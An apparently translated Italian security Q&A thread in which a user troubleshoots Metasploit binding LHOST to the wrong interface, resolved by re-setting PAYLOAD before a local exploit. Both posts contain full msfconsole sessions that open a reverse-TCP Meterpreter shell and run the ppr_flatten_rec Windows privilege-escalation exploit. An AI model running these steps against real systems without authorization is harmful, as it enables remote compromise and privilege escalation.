Metasploit usando l'indirizzo LHOST sbagliato

Naviga le tue risposte
1

Quando uso metasploit nel rilascio rolling aggiornato di Kali Linux aggiornato, quando utilizzo exploit / multi / handler con windows / meterpreter / reverse_tcp e gli exploit locali su meterpreter, il Il campo LHOST viene automaticamente modificato sull'IP dell'interfaccia Wi-Fi, quando in realtà voglio usare tap0 che è l'interfaccia VPN.

Ho provato a risolvere il problema con: 

set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0

Ma quando si usa il comando run , la vittima prova a connettersi al mio IP Wi-Fi, che ovviamente non è raggiungibile dalla VPN.

Ho avuto questo problema per almeno 6 mesi, indipendentemente da quando aggiorno Kali o metasploit. Apprezzo se qualcuno sa qual è il modo corretto di configurare metasploit.

[Modifica: Ulteriori dettagli]

Esempio del problema:

msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1 SESSION => 1 msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(windows/local/ppr_flatten_rec) > run [*] Started reverse TCP handler on 192.168.85.158:4444

L'intero contesto è: 

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.0.1:443 
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500

meterpreter > 
Background session 1? [y/N]  

msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run

[*] Started reverse TCP handler on **192.168.85.158**:4444 
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.85.158   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
    
posta Kali User 11.01.2018 - 15:56
fonte

1 risposta

0

La soluzione al mio problema è stata spiegata nei commenti di Mukesh (molte grazie a schroeder per avere il tempo di aiutarmi a strutturare meglio la domanda). La soluzione è di nuovo set PAYLOAD prima di ogni exploit locale che stai per utilizzare. 

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.0.1:4444 
[*] Sending stage (847604 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.158:57772) at 2018-01-11 16:30:40 -0500

meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp  <------- [previously this was missing]
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ppr_flatten_rec) > set LPORT 4445
LPORT => 4445
msf exploit(ppr_flatten_rec) > show options

Module options (exploit/windows/local/ppr_flatten_rec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   WAIT     10               yes       Number of seconds to wait for exploit to run


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.1     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(ppr_flatten_rec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.1:4445  <----- [Now the IP is the correct one]
    
risposta data 11.01.2018 - 22:46
fonte

Leggi altre domande sui tag

Necessità di creare un ambiente di intervista per un candidato di Security Engineer Quale traffico dovrebbe essere presente in una cattura di Wireshark quando si utilizza una VPN?